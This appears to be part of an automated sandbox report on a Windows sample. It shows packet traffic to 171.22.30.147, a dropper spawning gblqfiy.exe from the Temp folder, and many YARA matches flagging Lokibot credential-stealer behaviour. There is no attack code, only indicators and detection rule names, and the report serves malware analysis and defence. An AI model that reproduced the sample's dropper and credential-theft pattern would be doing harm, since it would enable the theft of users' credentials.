              Jan 5, 2023 08:52:08.145354986 CET8049702171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:08.145598888 CET4970280192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:08.155253887 CET4970280192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:08.156394005 CET4970180192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:08.182873011 CET8049702171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:08.183012009 CET4970280192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:08.183748960 CET8049701171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:08.210495949 CET8049702171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:08.238276958 CET8049702171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:08.238352060 CET8049702171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:08.238518000 CET4970280192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:08.239011049 CET4970280192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:08.266241074 CET8049702171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:08.534990072 CET4970380192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:08.562602997 CET8049703171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:08.562776089 CET4970380192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:08.565295935 CET4970380192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:08.592947006 CET8049703171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:08.593089104 CET4970380192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:08.620465040 CET8049703171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:08.643965006 CET8049703171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:08.644093990 CET8049703171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:08.644273043 CET4970380192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:08.644273043 CET4970380192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:08.671680927 CET8049703171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:08.904083967 CET4970480192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:08.931479931 CET8049704171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:08.931592941 CET4970480192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:08.934535027 CET4970480192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:08.961661100 CET8049704171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:08.961746931 CET4970480192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:08.989114046 CET8049704171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:09.015466928 CET8049704171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:09.015525103 CET8049704171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:09.015686989 CET4970480192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:09.015770912 CET4970480192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:09.042915106 CET8049704171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:09.330188036 CET4970580192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:09.357709885 CET8049705171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:09.357922077 CET4970580192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:09.363910913 CET4970580192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:09.391174078 CET8049705171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:09.391295910 CET4970580192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:09.418524981 CET8049705171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:09.452564955 CET8049705171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:09.452598095 CET8049705171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:09.452841043 CET4970580192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:09.452913046 CET4970580192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:09.480235100 CET8049705171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:09.735702991 CET4970680192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:09.763303995 CET8049706171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:09.765733004 CET4970680192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:09.771972895 CET4970680192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:09.799355984 CET8049706171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:09.799828053 CET4970680192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:09.827282906 CET8049706171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:09.863838911 CET8049706171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:09.863888025 CET8049706171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:09.864063978 CET4970680192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:09.864131927 CET4970680192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:09.894545078 CET8049706171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:10.300009012 CET4970780192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:10.327162027 CET8049707171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:10.327285051 CET4970780192.168.2.3171.22.30.147
              • 171.22.30.147

              Click to jump to process

              Target ID:0
              Start time:08:51:58
              Start date:05/01/2023
              Path:C:\Users\user\Desktop\zlP981oop5.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\zlP981oop5.exe
              Imagebase:0x400000
              File size:412163 bytes
              MD5 hash:29296EF70F898C80B0DAFEE4E1CA5998
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              Target ID:1
              Start time:08:51:59
              Start date:05/01/2023
              Path:C:\Users\user\AppData\Local\Temp\gblqfiy.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\Temp\gblqfiy.exe" C:\Users\user\AppData\Local\Temp\rznkfgz.rq
              Imagebase:0x400000
              File size:86016 bytes
              MD5 hash:B51AF47CC81518E4CF1128FBBEAE5877
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.259652732.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.259652732.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.259652732.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000002.259652732.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000001.00000002.259652732.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000002.259652732.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.259652732.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.259652732.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Antivirus matches:
              • Detection: 30%, Virustotal, Browse
              Reputation:low

              Target ID:2
              Start time:08:51:59
              Start date:05/01/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff745070000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:3
              Start time:08:52:00
              Start date:05/01/2023
              Path:C:\Users\user\AppData\Local\Temp\gblqfiy.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\Temp\gblqfiy.exe
              Imagebase:0x400000
              File size:86016 bytes
              MD5 hash:B51AF47CC81518E4CF1128FBBEAE5877
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000003.00000002.513357933.0000000000658000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.512147236.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000002.512147236.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000002.512147236.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000002.512147236.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000002.512147236.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000002.512147236.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000002.512147236.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000002.512147236.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:low

              No disassembly